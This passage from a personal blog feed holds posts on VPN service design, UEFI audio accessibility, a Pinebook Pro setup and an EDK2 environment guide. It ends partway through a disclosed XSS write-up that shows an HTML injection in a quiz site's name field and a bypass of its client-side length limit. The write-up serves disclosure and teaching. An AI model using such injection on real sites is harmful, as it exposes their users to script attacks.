This is the second biggest threat to the users’ data privacy, as this, by definition, cannot be encrypted as my server needs access to this data to decide whether a user should be allowed to: view a list of VPN nodes available to them or connect to a VPN.
|
|
|
The best I can think of in this case is:</p>
|
|
|
<ol>
|
|
|
<li>Use a system similar to the username: use a common salt and hash algorithm to store them in the database.</li>
|
|
|
<li>Use full-disk and full-database encryption to keep the data secure to outside attackers.</li>
|
|
|
</ol>
|
|
|
|
|
|
<p>This is not a fantastic solution, and still has the threat of a service provider snooping in on the database.
|
|
|
The truth is: a service provider has root access to any machine it hosts.
|
|
|
This necessitates that the <em>physical</em> infrastructure hosting the central database server must by physically owned and operated by the VPN operator and not any third party.
|
|
|
In addition, it means top security root passwords, tamper resistant cases (in the case of a co-hosting or server room environment), sensors to indicate it has been opened or touched.
|
|
|
If you thought this was bad, wait until the next part.</p>
|
|
|
|
|
|
<h3 id="active-connections">Active Connections</h3>
|
|
|
|
|
|
<p>In order to stop a user from simply using the entire bandwidth of all the VPN nodes available to them, there must be a way to know how many active connections the user has.
|
|
|
This is <em>by far</em> the biggest issue in terms of user privacy.
|
|
|
There are a few options here:</p>
|
|
|
<ol>
|
|
|
<li>Do not have a limit on the number of connections a user may have. This is dangerous from a <a href="https://en.wikipedia.org/wiki/Denial-of-service_attack">DDoS (distributed denial-of-service)</a> perspective.
|
|
|
This also makes the VPN provider vulnerable to be used as a DDoS distribution method by putting all their traffic through the VPN provider, and them not having any logs—the bad guys could use the distributed nature of VPN nodes to attack whoever they see fit.
|
|
|
This is not a viable option.</li>
|
|
|
<li>Have a list of connected users sent to the central server every 15 to 30 seconds. This is fairly efficient, but more privacy invasive.</li>
|
|
|
<li>When a user connects, log an explicit “connect” message.
|
|
|
When a user disconnects, send an explicit “disconnect”.
|
|
|
Have the VPN server report an <em>implicit</em> “disconnect” after an amount of time, say 15 minutes, then send an implicit “connect” message once traffic continues. This is all in RAM under temporary storage and is lost upon restart of the server.</li>
|
|
|
</ol>
|
|
|
|
|
|
<p>The best method (used currently by <a href="https://mullvad.net">Mullvad VPN</a>) is number 3.</p>
|
|
|
|
|
|
<h2 id="panel">Panel</h2>
|
|
|
|
|
|
<p>The admin panel will have some broad info about the nodes:</p>
|
|
|
|
|
|
<ul>
|
|
|
<li>Active connections</li>
|
|
|
<li>Server load (held and reported every minute by the nodes themselves. Not sure how to do this yet.)</li>
|
|
|
<li>Location</li>
|
|
|
<li>IP Address</li>
|
|
|
<li>Failed connections in last X amount of time (i.e. invalid credentials)</li>
|
|
|
<li>Physical server status (i.e. owned by the hoster vs. contracted out to another hosting company in the area)</li>
|
|
|
</ul>
|
|
|
|
|
|
<p>This panel would also have options to stop, start or soft stop the VPN service on each node for maintenance.
|
|
|
A soft stop will stop new connections and remove it from the list of available servers for the end-user. Users will disconnect whenever they feel like it—eventually winding down to zero connections.
|
|
|
This allows maintenance without service disruption.</p>
|
|
|
|
|
|
<p>I’m not sure how to do this securely.
|
|
|
Best I can think of right now is have an admin login, then have the server have a key in each node machine.
|
|
|
This completely compromises the SSH key system though.
|
|
|
Now every node is secured with nothing but a password. Maybe the console will require connecting to a local instance on a machine through an encrypted connection which will require a key.
|
|
|
Even then, that does make every machine vulnerable to one point of failure (the key to connect to the local instance).</p>
|
|
|
|
|
|
<p>Another way to approach this, security-wise is to make a shell script (or locally running flask app) which reads info about the servers from a sqlite database.
|
|
|
Then, it uses the local computer to connect to the servers—assuming the local machine has all the keys necessary to do so.</p>
|
|
|
|
|
|
<p>This fixes one problem and creates another.
|
|
|
It fixes the single point of failure in the cloud. This <em>massively</em> reduces the attack surface to intentionally stealing physical hardware from trusted parties, or software-hacking these same trusted people.
|
|
|
But, if the key is lost by the host… The entire service is kaput. No maintenance may be performed, no checks, bans, addition of servers can be done whatsoever.
|
|
|
This also increases the possibility of sloppy security from trusted parties.
|
|
|
Perhaps a trusted member leaves his laptop unattended for a few minutes and a hacker is able to steal the simple key file. He’s in!!!
|
|
|
This is very unlikely, I must say, but it comes down to: should I trust people or machines more to keep the data secure.
|
|
|
Depending on the person, I might trust them more.</p>
|
|
|
|
|
|
<h2 id="conclusion">Conclusion</h2>
|
|
|
|
|
|
<p>With all of these ideas in mind, I have realized how difficult it really is to make a VPN service.
|
|
|
Boy do they deserve every dollar they get!
|
|
|
If you don’t have a VPN, get one.
|
|
|
Doesn’t really matter which one, unless you’re a nerd—for your average person you can just pick whatever the best deal is at the time and you’re off to the races.</p>
|
|
|
|
|
|
<p>Anyway, I think I’ve rambled on long enough about VPNs and my crazy ideas, so I’m going to leave this one for now.</p>
|
|
|
|
|
|
<p>Happy VPN hacking :D</p></content><author><name></name></author><summary type="html">Recently I’ve been thinking about starting a VPN service. This service has some interesting requirements that I have never seen a VPN service do before, so I’d like to put down my thoughts as to what might be sensible for a centralized yet encrypted* VPN service.</summary></entry><entry><title type="html">UEFI Audio Protocol &amp; UEFI BIOS Accessibility</title><link href="/2021/06/21/uefi-audio/" rel="alternate" type="text/html" title="UEFI Audio Protocol &amp; UEFI BIOS Accessibility" /><published>2021-06-21T00:00:00-06:00</published><updated>2021-06-21T00:00:00-06:00</updated><id>/2021/06/21/uefi-audio</id><content type="html" xml:base="/2021/06/21/uefi-audio/"><p>Good news about the state of accessibility in the BIOS!</p>
|
|
|
|
|
|
<h2 id="preamble">Preamble</h2>
|
|
|
|
|
|
<p>On my <a href="/ideas/">ideas page</a>, I have always had up the idea of an accessibility layer for blind people to be able to use their BIOS.
|
|
|
Although it targets a very small percentage of the population,
|
|
|
computer programming is often at least a hobby of visually imapired individuals as it is (mostly) a text-based job:
|
|
|
You write code in plain text, then run it to get either plain text or some kind of HTML output.
|
|
|
Mostly an accessible career for those who cannot see.
|
|
|
That said, there has always been an issue with low-level computer infrastructure (i.e. the BIOS/UEFI).
|
|
|
These menus—which let you edit your boot order, RAM timings, CPU and GPU overclocking and sometimes even fan speed—they were completely inaccessible to those who could not see them.
|
|
|
Well, until… soon. I had a talk with one of the big bois working on EDK2, the UEFI implementation which is used by most motherboard vendors to create their firmware.
|
|
|
I thought I would share the info I understand, and the conversation in full.</p>
|
|
|
|
|
|
<h2 id="news">News</h2>
|
|
|
|
|
|
<p>Here is what I know:</p>
|
|
|
|
|
|
<ol>
|
|
|
<li>This year, the GSoC (Google Summer of Code) project had <a href="https://summerofcode.withgoogle.com/projects/#6499615798460416">a submission of Ethin Probst</a> to implement VirtIO audio drivers for EDK2.</li>
|
|
|
<li><a href="https://qemu.org">QEMU</a>, the emulator that was chosen to test for this project does not have VirtIO support (yet). I haven’t found info on when this will be done.</li>
|
|
|
<li>Because of 2, Ethin and his mentors for his project, Ray Ni and Leif Lindholm decided to first implement USB-dongle audio support first, as this is a) supported in QEMU, and b) is good enough to start squashing bugs at the audio level.</li>
|
|
|
<li>Because GSoC is usually over around September, there will likely be some more news coming soon!</li>
|
|
|
</ol>
|
|
|
|
|
|
<h2 id="the-irc-chat">The IRC Chat</h2>
|
|
|
|
|
|
<p>Here is the log of the IRC chat for anyone who is interested in anything I might have missed:</p>
|
|
|
|
|
|
<pre class="terminal">
|
|
|
tait_dot_tech: Hello there, I'm new to IRC so just checking my messages are coming through.
|
|
|
tait_dot_tech: Looks light it's alright. Ok so I have a question: does anyone know of an active project looking at making UEFI accessible to the blind (i.e. speec) [sic] from within the UEFI environment? Main concern is having blind users be able to boot Linux USBs (I know, very niche thing), but depending on how good it is, could potentially be used to allow blind individuals to change their overclocking,
|
|
|
tait_dot_tech: hardware RAID, boot order, RAM timings, etc. all on their own. Just wondering if there is any project doing this? I have tried my best to find anything, and am just trying not to duplicate effort. Thanks :)
|
|
|
leiflindholm: tait_dot_tech: we have a google summer of code project running this year, prototyping a standard for audio output. To hopefully be added to the UEFI specification in the future.
|
|
|
leiflindholm: once we have a standard for audio output, we can work on adding support for audio output to the Human Interface Infrastructure
|
|
|
leiflindholm: which is the thing that lets menus be loaded and displayed independent of specific graphical implementation
|
|
|
tait_dot_tech: Oh wow! Glad to hear there is progress on this! Is there a link to the Google summer of code project, or anything else where I can keep tabs?
|
|
|
leiflindholm: tait_dot_tech: there isn't much yet, we're only on week 3 of GSoC.
|
|
|
leiflindholm: https://summerofcode.withgoogle.com/projects/#6499615798460416 is the link if it's something you want to point others to, but any discussion/reporting is likely to hapen [sic] on our mailing lists
|
|
|
tait_dot_tech: By "our" mailing list, do you mean GSoC, or Edk2?
|
|
|
leiflindholm: edk2
|
|
|
leiflindholm: although, on average, at least 99% of edk2-devel will *not* be about audio support
|
|
|
leiflindholm: When we have anything interesting to say, we'll also post to edk2-discuss/edk2-announce
|
|
|
tait_dot_tech: Sweet! I'll join that one just in case! I'd be happy to test anything in beta-ish state and report back with any device I can get my hands on. Is that the right list to watch for hepling test it out?
|
|
|
leiflindholm: I'd say so.
|
|
|
leiflindholm: The original plan was to start with wirtio [sic] audio support, so anyone could help out anywhere, but that support is not yet upstream in qemu. So for now we're working on an [sic] USB audio class driver. That will certainly be useful to have more people testing with different equipment once we have something working.
|
|
|
tait_dot_tech: Ahh! So if I want to test, I should get a USB audio dongle. Gotcha! Thank you so much! You've been super helpful!
|
|
|
leiflindholm: np :)
|
|
|
</pre>
|
|
|
|
|
|
<p>Things are (slowly) looking up for audio (and eventually screen-reader support) in UEFI!
|
|
|
Phew! Glad I’m not the only one thinking about this!</p>
|
|
|
|
|
|
<p>Happy UEFI hacking :)</p></content><author><name></name></author><summary type="html">Good news about the state of accessibility in the BIOS!</summary></entry><entry><title type="html">Pinebook Pro, The Ultimate ARM Laptop</title><link href="/2021/06/02/pinebook-pro/" rel="alternate" type="text/html" title="Pinebook Pro, The Ultimate ARM Laptop" /><published>2021-06-02T00:00:00-06:00</published><updated>2021-06-02T00:00:00-06:00</updated><id>/2021/06/02/pinebook-pro</id><content type="html" xml:base="/2021/06/02/pinebook-pro/"><p>I recently got my Pinebook Pro.
|
|
|
It was more expensive than I was expecting, coming in at (including shipping and handling) C$335.
|
|
|
I always forget the exchange rate and assume it’s similar to the U.S. dollar, but it never is, haha!
|
|
|
Anyway, this is just my first impressions and what I did to fix a few issues.</p>
|
|
|
|
|
|
<h2 id="initial-impressions">Initial Impressions</h2>
|
|
|
|
|
|
<p>My first impressions of this are quite good.
|
|
|
I like the keyboard; it is firm and not mushy for the price.
|
|
|
It actually has a similar keyboard to my school-supplied Dell, which I quite enjoyed typing on.
|
|
|
The shell is aluminium and doesn’t feel <em>too</em> cheap, but I should note that it sure doesn’t feel like a Macbook if that’s what you’re expecting.
|
|
|
All in all build quality seems pretty good for a product in this price range.
|
|
|
I’m actually using it right now to write this article, and I’m actually typing faster than I would on my desktop.</p>
|
|
|
|
|
|
<p>The screen is bright enough and has anti-glare applied to it. I can use it with moderate light behind me, but not a sunset. Decent, and I can’t even use my phone with a sunset right on it, so that’s not a huge loss at all as I think my phone costs more than this haha!</p>
|
|
|
|
|
|
<p>The trackpad is fine.
|
|
|
I don’t use the mouse very often, and if I need it I’m more likely to bring an external one.
|
|
|
It works for what I need though.
|
|
|
I can’t seem to get the glossy protector off the trackpad though so maybe it would be better if I did haha!</p>
|
|
|
|
|
|
<p>The temperatures are okay. I would consider them not ideal.
|
|
|
The left side closer to the hinge can get quite warm when I push it.
|
|
|
To be expected in some respects, but the metal case certainly makes the heat come out fast and hot!
|
|
|
It is also passively cooled, so a bit of heat makes sense and is reasonable.
|
|
|
I wonder if I could mod this to have an active low-profile fan?
|
|
|
A project for later, I suppose.</p>
|
|
|
|
|
|
<p>The keyboard is pretty standard for a 14-inch laptop.
|
|
|
No numpad (except with function key), has F1-12 and media keys using function+F1-12.
|
|
|
Screen brightness, sound up, down and mute, and num and scroll lock.
|
|
|
These seem to work no matter what distribution you have (I’ve used Manjaro KDE and Manjaro Sway).
|
|
|
Perhaps this would react differently on Arch for ARM with no key bindings.
|
|
|
I’m not sure if this is implemented in software or hardware.</p>
|
|
|
|
|
|
<p>The speakers and very tin-y and do not sound good at all.
|
|
|
That said, they look very replaceable, so I’ll look into a mod in the future.
|
|
|
The Pinebook Pro comes with a headphone port, so you could just use that if the sound bothers you.</p>
|
|
|
|
|
|
<h2 id="some-suggestions">Some suggestions</h2>
|
|
|
|
|
|
<p>I had some issues when it first arrived.</p>
|
|
|
|
|
|
<ol>
|
|
|
<li>Reboot did not work. The display would glitch out and show horizontal lines. It would only work after a full shutdown.</li>
|
|
|
<li>Booting would sometimes not work at all. My SD card would sometimes boot, sometimes not. eMMC would sometimes work and sometimes not. Sometimes I would even get to the login screen, or fully logged in before it decided to freeze/hang. I could “drop to console” (Ctrl+Alt+Fx), but it only made my mouse stop showing, it would not actually display a console. This problem was worse when not plugged in.</li>
|
|
|
<li>Performance was not stellar, even for the RK3399.</li>
|
|
|
<li>I don’t like the Manjaro logo that displays during boot.</li>
|
|
|
</ol>
|
|
|
|
|
|
<h3 id="dont-use-kde">Don’t use KDE</h3>
|
|
|
|
|
|
<p>KDE for me is a bit slow.
|
|
|
It is not a keyboard-driven desktop.
|
|
|
To give it some credit though, it does at least have zoom support built in; this is something I wish other desktops would have enabled by default.
|
|
|
I’m looking at your, Xfce.</p>
|
|
|
|
|
|
<p>I switched to Manjaro Sway, which is a Wayland-based i3-like tiling window manager.
|
|
|
I’ve used this on my Raspberry Pi 4, and it is by far my preference among other default distro configurations.</p>
|
|
|
|
|
|
<p>This can be done by flashing an SD card with any random Linux distro, then download <a href="">Manjaro Sway ARM for the Pinebook Pro</a>.</p>
|
|
|
|
|
|
<p>Quickly, we should prepare the eMMC. Open <code class="language-plaintext highlighter-rouge">fdisk</code> with your eMMC module and remove all partitions.
|
|
|
If you have issues with this, check if any partition is mounted, unmount it, then try again.
|
|
|
<code class="language-plaintext highlighter-rouge">fdisk</code> is well documented elsewhere, so I won’t cover it here.</p>
|
|
|
|
|
|
<p>Once your .xz file is downloaded, <code class="language-plaintext highlighter-rouge">unxz</code> the .xz file downloaded.</p>
|
|
|
|
|
|
<pre class="terminal">
|
|
|
$ cd ~/Downloads
|
|
|
$ unxz Manjaro-Sway-ARM-pbp-20.10.img.xz
|
|
|
</pre>
|
|
|
|
|
|
<p>Not exactly those commands, but close.</p>
|
|
|
|
|
|
<p>Once you have that, flash your eMMC by using <code class="language-plaintext highlighter-rouge">dd</code>.</p>
|
|
|
|
|
|
<pre class="terminal">
|
|
|
# dd if=./Manjaro-Sway-ARM-pbp-20.10.img of=/dev/mmcblkX bs=1M conv=fsync
|
|
|
</pre>
|
|
|
|
|
|
<p>Now remove your SD card.
|
|
|
U-Boot will prefer your SD card over your eMMC, so if you leave it in, it <em>will</em> boot to your SD card.</p>
|
|
|
|
|
|
<h3 id="flash-your-u-boot-bsp">Flash Your U-Boot (BSP)</h3>
|
|
|
|
|
|
<p>U-Boot appeared to be the solution to my other two issues.
|
|
|
I was able to flash a new U-Boot program by using the following commands.
|
|
|
Be sure to run <code class="language-plaintext highlighter-rouge">lsblk</code> beforehand to know which <code class="language-plaintext highlighter-rouge">/dev/emmcblk</code> to write to.
|
|
|
Replace <code class="language-plaintext highlighter-rouge">X</code> with the correct number for your system.</p>
|
|
|
|
|
|
<pre class="terminal">
|
|
|
# pacman -S uboot-pinebookpro-bsp
|
|
|
# dd if=/boot/idbloader.img of=/dev/mmcblkX seek=64 conv=notrunc
|
|
|
# dd if=/boot/uboot.img of=/dev/mmcblkX seek=16384 conv=Notrunc
|
|
|
# dd if=/boot/trust.img of=/dev/mmcblkX seek=24576 conv=notrunc
|
|
|
</pre>
|
|
|
|
|
|
<p>The <code class="language-plaintext highlighter-rouge">dd</code> instructions are printed out after installing the <code class="language-plaintext highlighter-rouge">uboot-pinebookpro-bsp</code> package, so make sure to follow what is printed there if it is different that what I have provided.</p>
|
|
|
|
|
|
<p>After doing this, not only have I since booted 100% of the time,
|
|
|
but my display now works correctly after a reboot without a full shutdown.</p>
|
|
|
|
|
|
<p>Whew! Looking good!!!</p>
|
|
|
|
|
|
<h3 id="maybe-get-some-of-the-accessories">Maybe get some of the accessories</h3>
|
|
|
|
|
|
<p>I didn’t buy any accessories from Pine64.
|
|
|
I regret this somewhat.
|
|
|
For one thing, without an accessory to read the eMMC over USB, you need to have a working Linux distro on the SD card to get anywhere with it.
|
|
|
Flashing directly to the eMMC would have saved me a <em>lot</em> of time.</p>
|
|
|
|
|
|
<p>The other accessory I could see the occasional use for is the Ethernet adapter.
|
|
|
When downloading a big update (1GB+), it could be useful to wire in just temporarily.
|
|
|
Not a huge deal, but worth mentioning.</p>
|
|
|
|
|
|
<p>I would also be interested in the other batteries they have available.
|
|
|
Even though it comes with a battery, and I also don’t think you can install a second one, I would be interested to see if I could get more life out of it with an improved battery.
|
|
|
If this is a standard battery (Pine64 tends to use standard parts), then I would consider getting it from a supplier as well.</p>
|
|
|
|
|
|
<p>The Pinebook Pro does not come with any HDMI ports.
|
|
|
It comes with a USB type-C port that can be adapted to HDMI.
|
|
|
Or you can get a display that supports USB type-C.
|
|
|
I do not have a display that supports USB type-C, so it might be worth it for me to buy an adapter or find a compatible one more locally.
|
|
|
Shipping from Hong Kong ain’t cheap.</p>
|
|
|
|
|
|
<h3 id="replace-the-boot-logo">Replace the boot logo</h3>
|
|
|
|
|
|
<p>The boot splash screen can be replaced, but I haven’t figured out how yet.
|
|
|
I will post an update to the blog when I do find out.</p>
|
|
|
|
|
|
<h2 id="conclusion">Conclusion</h2>
|
|
|
|
|
|
<p>I really want to use the Pinebook Pro more.
|
|
|
Pine64 do a lot for the open-source community and they do their best to use only open hardware.
|
|
|
They do fail in some respects, but they do much better than the mainline distributors like Dell, HP or ASUS.</p>
|
|
|
|
|
|
<p>Thanks, Pine64! I’m excited to use your products!</p>
|
|
|
|
|
|
<p>Happy ARM hacking :)</p></content><author><name></name></author><summary type="html">I recently got my Pinebook Pro. It was more expensive than I was expecting, coming in at (including shipping and handling) C$335. I always forget the exchange rate and assume it’s similar to the U.S. dollar, but it never is, haha! Anyway, this is just my first impressions and what I did to fix a few issues.</summary></entry><entry><title type="html">UEFI Development On x86 With EDK2</title><link href="/2021/04/18/uefi-development-environment/" rel="alternate" type="text/html" title="UEFI Development On x86 With EDK2" /><published>2021-04-18T00:00:00-06:00</published><updated>2021-04-18T00:00:00-06:00</updated><id>/2021/04/18/uefi-development-environment</id><content type="html" xml:base="/2021/04/18/uefi-development-environment/"><p>I made this blog so I could remember how to do stuff that had instructions spread around the internet.
|
|
|
So here is how I setup my environment for developing EFI applications.</p>
|
|
|
|
|
|
<h2 id="requirements">Requirements</h2>
|
|
|
|
|
|
<p>On Artix or other Arch-based distros like Manjaro I installed the following packages: <code class="language-plaintext highlighter-rouge">gcc nasm iasl</code></p>
|
|
|
|
|
|
<p>Here is what the packages do:</p>
|
|
|
|
|
|
<ul>
|
|
|
<li>GCC is obviously the GNU Compiler Collection and it allows us to compile C code to machine code.</li>
|
|
|
<li>NASM stands for Netwide Assembler. It is an assembler and disassembler for 32 and 64 bit Intel x86 platforms.</li>
|
|
|
<li>IASL stands for the ACPI Source Language Compiler/Decompiler. This will compile any ACPI calls to our local machine’s code.</li>
|
|
|
</ul>
|
|
|
|
|
|
<p>We need all these packages to start our (U)EFI journey.
|
|
|
Now that these are installed, let’s setup our environment.</p>
|
|
|
|
|
|
<h2 id="building-edk2">Building EDK2</h2>
|
|
|
|
|
|
<p>I used the stable/202011 branch as that is latest stable version of the EDK2 project.</p>
|
|
|
|
|
|
<p>So first let’s pull the project:</p>
|
|
|
|
|
|
<p><code class="language-plaintext highlighter-rouge">git clone https://github.com/tianocore/edk2.git</code></p>
|
|
|
|
|
|
<p>Now, let’s fetch the tags and switch to the latest stable version:</p>
|
|
|
|
|
|
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd edk2
|
|
|
git fetch
|
|
|
git checkout stable/202011
|
|
|
</code></pre></div></div>
|
|
|
|
|
|
<p>Perfect! We’re on stable now! Let’s grab all our submodules: <code class="language-plaintext highlighter-rouge">git submodule update --init</code></p>
|
|
|
|
|
|
<p>This will take a bit the first time you do it. But no fear, once that’s done, we can finally build the base tools.</p>
|
|
|
|
|
|
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make -C BaseTools
|
|
|
export EDK_TOOLS_PATH=$HOME/Documents/edk2/BaseTools
|
|
|
. edksetup.sh BaseTools
|
|
|
</code></pre></div></div>
|
|
|
|
|
|
<p>Notice we source a file with <code class="language-plaintext highlighter-rouge">.</code> before continuing. This is needed to load some tools and options into our shell for later. The environment variable <code class="language-plaintext highlighter-rouge">EDK_TOOLS_PATH</code> is set so that EDK knows where to find itself later. Now that everything is loaded up, we can modify a config file located at <code class="language-plaintext highlighter-rouge">Conf/target.txt</code>.</p>
|
|
|
|
|
|
<p>The most important options are these, feel free to append them to the end of the file; there is no default value for them.</p>
|
|
|
|
|
|
<pre class="file">
|
|
|
ACTIVE_PLATFORM = MdeModulePkg/MdeModulePkg.dsc
|
|
|
TOOL_CHAIN_TAG = GCC5
|
|
|
# for 64-bit development
|
|
|
TARGET_ARCH = X64
|
|
|
# for 32-bit development
|
|
|
TARGET_ARCH = IA32
|
|
|
# for 32 and 64-bit development
|
|
|
TARGET_ARCH = IA32 X64
|
|
|
|
|
|
# set multithreading to 1 + (2 x # of cores)
|
|
|
MAX_CONCURRENT_THREAD_NUMBER = 9
|
|
|
</pre>
|
|
|
|
|
|
<p>There are other options, but I don’t know about them much, so I’m just sticking with this for now.</p>
|
|
|
|
|
|
<p>Finally, after all this work, we can build some .efi files. Let’s compile the <code class="language-plaintext highlighter-rouge">Helloworld.efi</code> file!
|
|
|
Simply run the <code class="language-plaintext highlighter-rouge">build</code> command in the terminal.
|
|
|
You can find your compiled EFI files by running this <code class="language-plaintext highlighter-rouge">ls</code> command:</p>
|
|
|
|
|
|
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ls Build/MdeModule/DEBUG_*/*/HelloWorld.efi
|
|
|
</code></pre></div></div>
|
|
|
|
|
|
<p>This will show all HelloWorld.efi files for all architectures and toolchains (if you decide to change them).</p>
|
|
|
|
|
|
<h2 id="running-in-uefi-shell">Running In UEFI Shell</h2>
|
|
|
|
|
|
<p>Once all this is complete, you will want to run your EFI files.
|
|
|
To do so, let’s first add an EFI shell to use at boot.
|
|
|
This will appear as an option in your bootloader, like GRUB, which is what I will show documentation for in this article.</p>
|
|
|
|
|
|
<p>So, first thing is first,
|
|
|
<a href="https://github.com/tianocore/edk2/blob/UDK2018/ShellBinPkg/UefiShell/X64/Shell.efi?raw=true">download and EFI shell file</a>.
|
|
|
Second, move it to a partition (FAT formatted) which can be used for the UEFI.
|
|
|
On my Linux system, this is /boot. On others there may be no FAT filesystem so attach a USB and format it as FAT.
|
|
|
Third, add the <code class="language-plaintext highlighter-rouge">EFI Shell</code> option to your grub boot file.
|
|
|
Substitute hdX with the right hard drive (I did it with trial and error) as when it doesn’t work I would hit ‘e’ on grub and add the <code class="language-plaintext highlighter-rouge">ls</code> GRUB command.
|
|
|
Substitute the gptX with the correct partition, or msdosX if it is a DOS formatted partition table.
|
|
|
My <code class="language-plaintext highlighter-rouge">Shell.efi</code> was placed in /boot/EFI/.</p>
|
|
|
|
|
|
<p><label>/etc/grub.d/40_custom</label></p>
|
|
|
<pre class="file">
|
|
|
menuentry "EFI Shell" {
|
|
|
insmod part_gpt
|
|
|
insmod chain
|
|
|
insmod fat
|
|
|
set root='(hd4,gpt2)'
|
|
|
chainloader /EFI/Shell.efi
|
|
|
}
|
|
|
</pre>
|
|
|
|
|
|
<p>Now regenerate your grub configuration file with <code class="language-plaintext highlighter-rouge">grub-update</code> (Debian-based) or <code class="language-plaintext highlighter-rouge">grub-mkconfig -o /boot/grub/grub.cfg</code> (Other).</p>
|
|
|
|
|
|
<p>You’ll know if your shell is working if you see the following text on boot into the EFI shell:</p>
|
|
|
|
|
|
<pre class="terminal">
|
|
|
UEFI Interactive Shell v2.1
|
|
|
EDK II
|
|
|
UEFI v2.4 (EDI II, 0x000100000)
|
|
|
Mapping table:
|
|
|
...
|
|
|
Shell&gt;
|
|
|
</pre>
|
|
|
|
|
|
<h2 id="running-hello-world">Running Hello World</h2>
|
|
|
|
|
|
<p>When we run our <code class="language-plaintext highlighter-rouge">ls</code> command from earlier, remember we saw our <code class="language-plaintext highlighter-rouge">HelloWorld.efi</code> file.
|
|
|
Let’s move this file somewhere useful, like for me, <code class="language-plaintext highlighter-rouge">/boot</code>.
|
|
|
Then, once we’re in our UEFI shell we can run commands:</p>
|
|
|
|
|
|
<pre class="terminal">
|
|
|
Shell&gt; .\HelloWorld.efi
|
|
|
UEFI Hello World!
|
|
|
Shell&gt;
|
|
|
</pre>
|
|
|
|
|
|
<p>And that… All that is how you set up a UEFI development environment.</p>
|
|
|
|
|
|
<h2 id="conclusion">Conclusion</h2>
|
|
|
|
|
|
<p>This took me a long time to figure out.
|
|
|
I needed to scrounge resources from around the internet,
|
|
|
and I had to look at my config files for hours to make sure that I hadn’t missed a step that I did without thinking.
|
|
|
I hope this will be useful to you and my future self.</p>
|
|
|
|
|
|
<p>Happy UEFI hacking :)</p></content><author><name></name></author><summary type="html">I made this blog so I could remember how to do stuff that had instructions spread around the internet. So here is how I setup my environment for developing EFI applications.</summary></entry><entry><title type="html">The “Quiz Your Friends” XSS Exploit</title><link href="/2021/04/04/quiz-your-friends-xss/" rel="alternate" type="text/html" title="The “Quiz Your Friends” XSS Exploit" /><published>2021-04-04T00:00:00-06:00</published><updated>2021-04-04T00:00:00-06:00</updated><id>/2021/04/04/quiz-your-friends-xss</id><content type="html" xml:base="/2021/04/04/quiz-your-friends-xss/"><p>Note: I have alerted the administrators of this site multiple times about this vulnerability.
|
|
|
One email was sent many years ago, which is more than enough time for <a href="https://en.wikipedia.org/wiki/Responsible_disclosure">responsible disclosure</a>.</p>
|
|
|
|
|
|
<p>Update: They have fixed the vulnerability as of the day of release for this article.</p>
|
|
|
|
|
|
<h2 id="background">Background</h2>
|
|
|
|
|
|
<p>In early 2014, when my “programming” skills consisted of editing web pages with inspect element, I was sent a link from an old friend in a town about 3 hours away.
|
|
|
This was a link to a quiz about them.
|
|
|
I had to answer as many questions right as I could about them and I got a score at the end based on my answers.
|
|
|
It seemed fun enough, so I went for it.
|
|
|
In the following weeks this quiz website became quite a trend amongst my friend group as we all started making quizes to see how well we all knew eachother.</p>
|
|
|
|
|
|
<p>A few weeks into this trend, I was staying at a friends’ place and told him about this site,
|
|
|
so he goes and creates his own quiz and sends it to all his friends, group chats, Google Plus groups, et cetera.</p>
|
|
|
|
|
|
<h2 id="hackerman">Hackerman</h2>
|
|
|
|
|
|
<p>While filling in my friend’s survey I thought it would be
|
|
|
funny for them to know it is me without anyone else knowing.
|
|
|
We were young and had <code class="language-plaintext highlighter-rouge">Inspect Element</code>ed a few things together,
|
|
|
so it was a safe bet that an HTML joke would let them know.</p>
|
|
|
|
|
|
<p>I decided to write my name like so: <code class="language-plaintext highlighter-rouge">&lt;b&gt;Steve&lt;/b&gt;</code>.
|
|
|
Steve is in reference to the <a href="https://minecraft.gamepedia.com/Player">main character</a> in the video game Minecraft.</p>
|
|
|
|
|
|
<figure>
|
|
|
<img src="/assets/img/qyf-xss/2-bold.png" />
|
|
|
<figcaption>
|
|
|
<p>Me typing in my name as <span class="mono">&lt;b&gt;Steve&lt;/b&gt;</span>.</p>
|
|
|
</figcaption>
|
|
|
</figure>
|
|
|
|
|
|
<p>Now in theory this should have shown in in the leaderboard as: “&lt;b&gt;Steve&lt;/b&gt;”
|
|
|
However, to my horror and excitement, I saw this in the leaderboard:</p>
|
|
|
|
|
|
<figure>
|
|
|
<img src="/assets/img/qyf-xss/3-steve-board.png" />
|
|
|
<figcaption>
|
|
|
<p><span class="mono">&lt;b&gt;Steve&lt;/b&gt;</span> displaying in the leaderboard as bold text: <b>Steve</b></p>
|
|
|
</figcaption>
|
|
|
</figure>
|
|
|
|
|
|
<p>The text “Steve” showed up <strong>in bold</strong> on the leaderboard.
|
|
|
This told me all I needed to know.
|
|
|
How did this happen? You might wonder.</p>
|
|
|
|
|
|
<h3 id="server-side-validation">Server-Side Validation</h3>
|
|
|
|
|
|
<p>Here is a great demonstration why you should do most of your validation on the server side.
|
|
|
As a user, I can edit any of the HTML, CSS, or Javascript your server serves to me.</p>
|
|
|
|
|
|
<p>Quiz your friends uses the <code class="language-plaintext highlighter-rouge">maxlength=20</code> HTML attribute on the name input field.
|
|
|
Imagine trying to fit in a script tag doing anything useful with 20 characters! Don’t forget that includes the <code class="language-plaintext highlighter-rouge">&lt;script&gt;</code> tag.
|
|
|
That would leave 13 characters for Javascript.
|
|
|
Although I’m sure a genius would be able to <a href="https://code.golf/">code golf</a> that, I know I couldn’t.</p>
|
|
|
|
|
|
<p>Now obviously I can edit any HTML that a server has sent to me.
|
|
|
If I open up my inspect element window, I can go ahead and change that <code class="language-plaintext highlighter-rouge">maxlength</code> attribute to anything I want.
|
|
|
Let’s change it to 100!</p>
|
|
|
|
|
|
<figure>
|
|
|
<img src="/assets/img/qyf-xss/5-maxlength.png" alt="An image of the Quiz Your Friends name input field with inspect element. THe code reads: &lt;font class=&quot;style6&quot;&gt;&lt;input class=&quot;inputbutton&quot; name=&quot;takername&quot; type=&quot;text&quot; id=&quot;takername&quot; maxlength=&quot;20&quot; width=&quot;425&quot; placeholder=&quot;Your First Name&quot; style=&quot;text-align: center; text-decoration:inherit; font-size:38px;&quot; tabindex=&quot;-1&quot;&gt;&lt;/font&gt;" />
|
|
|
<figcaption>
|
|
|
Manually changing the maxlength attribute.
|
|
|
</figcaption>
|
|
|
</figure>
|
|
|
|
|
|
<p>In theory, there is a way that a site can stop people from just putting in their name of any length: server-side validation.
|
|
|
